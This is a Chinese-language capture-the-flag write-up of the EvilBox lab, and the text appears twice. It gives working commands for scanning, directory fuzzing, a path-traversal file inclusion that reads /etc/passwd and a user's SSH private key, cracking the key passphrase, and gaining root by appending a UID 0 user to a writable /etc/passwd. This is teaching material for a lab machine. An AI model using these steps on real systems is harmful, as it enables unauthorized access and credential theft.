1.arp主机扫描我的靶机和我kali的eth1网卡处于同一局域网所以命令这样写arp-scan -I eth1 192.168.15.4/242.发现目标ip为192.168.15.7(192.168.15.2是我的虚拟网卡VirtualBox Host-Only Ethernret Adapter的DHCP服务器ip地址对目标ip进行端口与服务扫描rustscan -a 192.168.15.7┌──(root192.168.52.130 172.17.0.1:~ ]- └─ rustscan -a 192.168.15.7 .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | | | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | - ---------- - ---- --- - -- - The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- RustScan: Where 404 Not Found meets 200 OK. [~] The config file is expected to be at /root/.rustscan.toml [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScans speed. Use the Docker image, or up the Ulimit with --ulimit 5000. Open 192.168.15.7:22 Open 192.168.15.7:80 [~] Starting Script(s) [~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-18 16:46 0800 Initiating ARP Ping Scan at 16:46 Scanning 192.168.15.7 [1 port] Completed ARP Ping Scan at 16:46, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 16:46 Completed Parallel DNS resolution of 1 host. at 16:46, 0.50s elapsed DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 16:46 Scanning 192.168.15.7 [2 ports] Discovered open port 22/tcp on 192.168.15.7 Discovered open port 80/tcp on 192.168.15.7 Completed SYN Stealth Scan at 16:46, 0.02s elapsed (2 total ports) Nmap scan report for 192.168.15.7 Host is up, received arp-response (0.0014s latency). Scanned at 2026-03-18 16:46:20 CST for 0s PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 64 MAC Address: 08:00:27:D4:4F:BD (Oracle VirtualBox virtual NIC) Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)3.发现目标开放了22和80端口然后再用nmap对这两个端口进行初步漏洞扫描┌──(root192.168.52.130 172.17.0.1:~ ]- └─ nmap -p 80,22 --script vuln 192.168.15.7 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-18 16:41 0800 Nmap scan report for 192.168.15.7 Host is up (0.00037s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-stored-xss: Couldnt find any stored XSS vulnerabilities. |_http-dombased-xss: Couldnt find any DOM based XSS. |_http-csrf: Couldnt find any CSRF vulnerabilities. | http-enum: | /robots.txt: Robots file |_ /secret/: Potentially interesting folder MAC Address: 08:00:27:D4:4F:BD (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 32.21 seconds4.nmap并没有扫描到什么关键漏洞信息看看web服务页面5.源代码也没发现什么重要信息直接用gobuster进行目录扫描gobuster dir -u http://192.168.15.7/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,sh,js,asp6.暂时只扫出来这些目录分别看看7.我发现就这2个页面有点价值第一个页面就是一个信息“Hello H4x0r”就是“你好黑客”的意思8.第2个页面有点意思页面空白那就再次在这个页面的基础上对这个页面进行目录扫描gobuster dir -u http://192.168.15.7/secret/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,sh,js,asp9.扫到一个evil.php文件但是响应大小为0看看10.我怀疑应该这个evil.php文件需要传入一个参数使用ffuf工具进行爆破ffuf -u http://192.168.15.7/secret/evil.php?FUZZWFUZZ -w /root/fileid.txt:FUZZ,/root/fil-payloads-scanner.txt:WFUZZ -fc 400 -fs 011.发现一个类似于本地文件包含的漏洞访问看看http://192.168.15.7/secret/evil.php?command..%2f..%2f..%2f..%2f..%2f/etc/passwd12.发现一个普通用户mowree因为之前也扫到这个系统也开放了22的ssh服务那就用本地文件包含看看目标用户家目录下一般生成公私钥都会放在家目录下面有没有私钥存在curl -s http://192.168.15.7/secret/evil.php?command../../../../../../home/mowree/.ssh/id_rsa | sed -n /-----BEGIN/,/-----END/p id_rsa_new13.还真的有输入以下命令进行登录ssh -i id_rsa_new mowree192.168.15.714.居然设置了密码短语那就爆破一手┌──(root192.168.52.130 172.17.0.1:~ ]- └─ file id_rsa_new id_rsa_new: PEM RSA private key ┌──(root192.168.52.130 172.17.0.1:~ ]- └─ /usr/share/john/ssh2john.py id_rsa_new hash ┌──(root192.168.52.130 172.17.0.1:~ ]- └─ john --wordlist/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0MD5/AES 1MD5/3DES 2Bcrypt/AES]) is 1 for all loaded hashes Cost 2 (iteration count) is 2 for all loaded hashes Will run 4 OpenMP threads Press q or Ctrl-C to abort, almost any other key for status unicorn (id_rsa_new) 1g 0:00:00:00 DONE (2026-03-18 17:07) 100.0g/s 124800p/s 124800c/s 124800C/s buttons..cheer1 Use the --show option to display all of the cracked passwords reliably Session completed.15.爆破成功密码为unicorn再次尝试登陆┌──(root192.168.52.130 172.17.0.1:~ ]- └─ ssh -i id_rsa_new mowree192.168.15.7 ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to store now, decrypt later attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html WARNING: UNPROTECTED PRIVATE KEY FILE! Permissions 0644 for id_rsa_new are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key id_rsa_new: bad permissions mowree192.168.15.7s password: Permission denied, please try again. mowree192.168.15.7s password: Permission denied, please try again. mowree192.168.15.7s password:16.登陆失败了后面又仔细看了看发现是权限设置的问题必须确保私钥文件权限安全需要把私钥文件的权限设置为600否则SSH会拒绝使用┌──(root192.168.52.130 172.17.0.1:~ ]- └─ ls -al id_rsa_new -rw-r--r-- 1 root root 1743 3月18日 17:04 id_rsa_new ┌──(root192.168.52.130 172.17.0.1:~ ]- └─ chmod 600 id_rsa_new ┌──(root192.168.52.130 172.17.0.1:~ ]- └─ ls -al id_rsa_new -rw------- 1 root root 1743 3月18日 17:04 id_rsa_new ┌──(root192.168.52.130 172.17.0.1:~ ]- └─ ssh -i id_rsa_new mowree192.168.15.7 ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to store now, decrypt later attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html Enter passphrase for key id_rsa_new: Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 -bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8) mowreeEvilBoxOne:~$17.登陆成功进行信息收集mowreeEvilBoxOne:~$ pwd /home/mowree mowreeEvilBoxOne:~$ id uid1000(mowree) gid1000(mowree) groups1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) mowreeEvilBoxOne:~$ ll -bash: ll: command not found mowreeEvilBoxOne:~$ ls user.txt mowreeEvilBoxOne:~$ cat user.txt 56Rbp0soobpzWSVzKh9YOvzGLgtPZQ mowreeEvilBoxOne:/$ find / -perm -us -type f 2/dev/null /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/mount /usr/bin/newgrp /usr/bin/passwd /usr/bin/umount /usr/bin/chfn /usr/bin/chsh /usr/bin/gpasswd /usr/bin/su看到这个passwd有suid权限这个其实很正常那就顺便再看看/etc/passwd的权限mowreeEvilBoxOne:/tmp$ ls -l /etc/passwd -rw-rw-rw- 1 root root 1398 Aug 16 2021 /etc/passwd18.这个/etc/passwd文件权限居然配置错误了居然允许普通用户直接写入,但是我并不确定我写入一个root权限的用户到这个/etc/passwd里面之后系统是否会直接认证/etc/passwd中的密码字段所以看看/etc/pam.d/common-auth文件内容我发现PAM 配置允许回退到/etc/passwd在/etc/pam.d/common-auth中关键配置是auth [success1 defaultignore] pam_unix.so nullok_securepam_unix.so 模块默认行为是先检查/etc/shadow如果找不到用户或shadow条目有问题会回退到检查/etc/passwd中的密码字段。nullok_secure 参数允许空密码但仅从安全终端登录但没有强制只使用shadow。19.在kali系统上使用openssl生成一个密码的哈希值┌──(root192.168.52.130 172.17.0.1:/ ]- └─ openssl passwd -1 -salt xyz 123456 $1$xyz$X11iz6ox24iPDed6detyU.20.向/etc/passwd文件末尾添加一行,在 UID (0) 后面添加了 GID (0)确保格式为用户名:密码哈希:UID:GID:描述:家目录:shell,执行su evil输入密码evil在现代大多数启用/etc/shadow密码shadow机制的系统上/etc/passwd文件中的密码字段第二个字段通常被x占位实际密码哈希存储在只有root可读的/etc/shadow中。但此命令试图绕过此机制直接在/etc/passwd中写入密码哈希。其成功与否取决于系统的pam_unix等认证模块的具体配置部分旧系统或特殊配置可能仍会读取此字段我刚刚恰好验证过该系统PAM 配置允许回退到/etc/passwd意思就是如果在/etc/shadow找不到用户或shadow条目有问题就会回退到检查/etc/passwd中的密码字段然后直接允许使用/etc/passwd中的密码字段来进行验证发现成功获得root shell。mowreeEvilBoxOne:/tmp$ echo evil:$1$xyz$X11iz6ox24iPDed6detyU.:0:0:root:/root:/bin/bash /etc/passwd mowreeEvilBoxOne:/tmp$ su evil Password: bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8) rootEvilBoxOne:/tmp#21.查看最后一个flagrootEvilBoxOne:/tmp# cd /root rootEvilBoxOne:~# ls root.txt rootEvilBoxOne:~# cat root.txt 36QtXfdJWvdC0VavlPIApUbDlqTsBM22.完成
EvilBox靶场
发布时间:2026/5/21 5:55:05
1.arp主机扫描我的靶机和我kali的eth1网卡处于同一局域网所以命令这样写arp-scan -I eth1 192.168.15.4/242.发现目标ip为192.168.15.7(192.168.15.2是我的虚拟网卡VirtualBox Host-Only Ethernret Adapter的DHCP服务器ip地址对目标ip进行端口与服务扫描rustscan -a 192.168.15.7┌──(root192.168.52.130 172.17.0.1:~ ]- └─ rustscan -a 192.168.15.7 .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | | | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | - ---------- - ---- --- - -- - The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- RustScan: Where 404 Not Found meets 200 OK. [~] The config file is expected to be at /root/.rustscan.toml [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScans speed. Use the Docker image, or up the Ulimit with --ulimit 5000. Open 192.168.15.7:22 Open 192.168.15.7:80 [~] Starting Script(s) [~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-18 16:46 0800 Initiating ARP Ping Scan at 16:46 Scanning 192.168.15.7 [1 port] Completed ARP Ping Scan at 16:46, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 16:46 Completed Parallel DNS resolution of 1 host. at 16:46, 0.50s elapsed DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 16:46 Scanning 192.168.15.7 [2 ports] Discovered open port 22/tcp on 192.168.15.7 Discovered open port 80/tcp on 192.168.15.7 Completed SYN Stealth Scan at 16:46, 0.02s elapsed (2 total ports) Nmap scan report for 192.168.15.7 Host is up, received arp-response (0.0014s latency). Scanned at 2026-03-18 16:46:20 CST for 0s PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 64 MAC Address: 08:00:27:D4:4F:BD (Oracle VirtualBox virtual NIC) Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)3.发现目标开放了22和80端口然后再用nmap对这两个端口进行初步漏洞扫描┌──(root192.168.52.130 172.17.0.1:~ ]- └─ nmap -p 80,22 --script vuln 192.168.15.7 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-18 16:41 0800 Nmap scan report for 192.168.15.7 Host is up (0.00037s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-stored-xss: Couldnt find any stored XSS vulnerabilities. |_http-dombased-xss: Couldnt find any DOM based XSS. |_http-csrf: Couldnt find any CSRF vulnerabilities. | http-enum: | /robots.txt: Robots file |_ /secret/: Potentially interesting folder MAC Address: 08:00:27:D4:4F:BD (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 32.21 seconds4.nmap并没有扫描到什么关键漏洞信息看看web服务页面5.源代码也没发现什么重要信息直接用gobuster进行目录扫描gobuster dir -u http://192.168.15.7/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,sh,js,asp6.暂时只扫出来这些目录分别看看7.我发现就这2个页面有点价值第一个页面就是一个信息“Hello H4x0r”就是“你好黑客”的意思8.第2个页面有点意思页面空白那就再次在这个页面的基础上对这个页面进行目录扫描gobuster dir -u http://192.168.15.7/secret/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,sh,js,asp9.扫到一个evil.php文件但是响应大小为0看看10.我怀疑应该这个evil.php文件需要传入一个参数使用ffuf工具进行爆破ffuf -u http://192.168.15.7/secret/evil.php?FUZZWFUZZ -w /root/fileid.txt:FUZZ,/root/fil-payloads-scanner.txt:WFUZZ -fc 400 -fs 011.发现一个类似于本地文件包含的漏洞访问看看http://192.168.15.7/secret/evil.php?command..%2f..%2f..%2f..%2f..%2f/etc/passwd12.发现一个普通用户mowree因为之前也扫到这个系统也开放了22的ssh服务那就用本地文件包含看看目标用户家目录下一般生成公私钥都会放在家目录下面有没有私钥存在curl -s http://192.168.15.7/secret/evil.php?command../../../../../../home/mowree/.ssh/id_rsa | sed -n /-----BEGIN/,/-----END/p id_rsa_new13.还真的有输入以下命令进行登录ssh -i id_rsa_new mowree192.168.15.714.居然设置了密码短语那就爆破一手┌──(root192.168.52.130 172.17.0.1:~ ]- └─ file id_rsa_new id_rsa_new: PEM RSA private key ┌──(root192.168.52.130 172.17.0.1:~ ]- └─ /usr/share/john/ssh2john.py id_rsa_new hash ┌──(root192.168.52.130 172.17.0.1:~ ]- └─ john --wordlist/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0MD5/AES 1MD5/3DES 2Bcrypt/AES]) is 1 for all loaded hashes Cost 2 (iteration count) is 2 for all loaded hashes Will run 4 OpenMP threads Press q or Ctrl-C to abort, almost any other key for status unicorn (id_rsa_new) 1g 0:00:00:00 DONE (2026-03-18 17:07) 100.0g/s 124800p/s 124800c/s 124800C/s buttons..cheer1 Use the --show option to display all of the cracked passwords reliably Session completed.15.爆破成功密码为unicorn再次尝试登陆┌──(root192.168.52.130 172.17.0.1:~ ]- └─ ssh -i id_rsa_new mowree192.168.15.7 ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to store now, decrypt later attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html WARNING: UNPROTECTED PRIVATE KEY FILE! Permissions 0644 for id_rsa_new are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key id_rsa_new: bad permissions mowree192.168.15.7s password: Permission denied, please try again. mowree192.168.15.7s password: Permission denied, please try again. mowree192.168.15.7s password:16.登陆失败了后面又仔细看了看发现是权限设置的问题必须确保私钥文件权限安全需要把私钥文件的权限设置为600否则SSH会拒绝使用┌──(root192.168.52.130 172.17.0.1:~ ]- └─ ls -al id_rsa_new -rw-r--r-- 1 root root 1743 3月18日 17:04 id_rsa_new ┌──(root192.168.52.130 172.17.0.1:~ ]- └─ chmod 600 id_rsa_new ┌──(root192.168.52.130 172.17.0.1:~ ]- └─ ls -al id_rsa_new -rw------- 1 root root 1743 3月18日 17:04 id_rsa_new ┌──(root192.168.52.130 172.17.0.1:~ ]- └─ ssh -i id_rsa_new mowree192.168.15.7 ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to store now, decrypt later attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html Enter passphrase for key id_rsa_new: Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 -bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8) mowreeEvilBoxOne:~$17.登陆成功进行信息收集mowreeEvilBoxOne:~$ pwd /home/mowree mowreeEvilBoxOne:~$ id uid1000(mowree) gid1000(mowree) groups1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) mowreeEvilBoxOne:~$ ll -bash: ll: command not found mowreeEvilBoxOne:~$ ls user.txt mowreeEvilBoxOne:~$ cat user.txt 56Rbp0soobpzWSVzKh9YOvzGLgtPZQ mowreeEvilBoxOne:/$ find / -perm -us -type f 2/dev/null /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/mount /usr/bin/newgrp /usr/bin/passwd /usr/bin/umount /usr/bin/chfn /usr/bin/chsh /usr/bin/gpasswd /usr/bin/su看到这个passwd有suid权限这个其实很正常那就顺便再看看/etc/passwd的权限mowreeEvilBoxOne:/tmp$ ls -l /etc/passwd -rw-rw-rw- 1 root root 1398 Aug 16 2021 /etc/passwd18.这个/etc/passwd文件权限居然配置错误了居然允许普通用户直接写入,但是我并不确定我写入一个root权限的用户到这个/etc/passwd里面之后系统是否会直接认证/etc/passwd中的密码字段所以看看/etc/pam.d/common-auth文件内容我发现PAM 配置允许回退到/etc/passwd在/etc/pam.d/common-auth中关键配置是auth [success1 defaultignore] pam_unix.so nullok_securepam_unix.so 模块默认行为是先检查/etc/shadow如果找不到用户或shadow条目有问题会回退到检查/etc/passwd中的密码字段。nullok_secure 参数允许空密码但仅从安全终端登录但没有强制只使用shadow。19.在kali系统上使用openssl生成一个密码的哈希值┌──(root192.168.52.130 172.17.0.1:/ ]- └─ openssl passwd -1 -salt xyz 123456 $1$xyz$X11iz6ox24iPDed6detyU.20.向/etc/passwd文件末尾添加一行,在 UID (0) 后面添加了 GID (0)确保格式为用户名:密码哈希:UID:GID:描述:家目录:shell,执行su evil输入密码evil在现代大多数启用/etc/shadow密码shadow机制的系统上/etc/passwd文件中的密码字段第二个字段通常被x占位实际密码哈希存储在只有root可读的/etc/shadow中。但此命令试图绕过此机制直接在/etc/passwd中写入密码哈希。其成功与否取决于系统的pam_unix等认证模块的具体配置部分旧系统或特殊配置可能仍会读取此字段我刚刚恰好验证过该系统PAM 配置允许回退到/etc/passwd意思就是如果在/etc/shadow找不到用户或shadow条目有问题就会回退到检查/etc/passwd中的密码字段然后直接允许使用/etc/passwd中的密码字段来进行验证发现成功获得root shell。mowreeEvilBoxOne:/tmp$ echo evil:$1$xyz$X11iz6ox24iPDed6detyU.:0:0:root:/root:/bin/bash /etc/passwd mowreeEvilBoxOne:/tmp$ su evil Password: bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8) rootEvilBoxOne:/tmp#21.查看最后一个flagrootEvilBoxOne:/tmp# cd /root rootEvilBoxOne:~# ls root.txt rootEvilBoxOne:~# cat root.txt 36QtXfdJWvdC0VavlPIApUbDlqTsBM22.完成
✅)
)
设置实战,轻松搞定示意图与流程图)
角色为何在创业公司成为最稀缺的竞争力?)
)
)
)
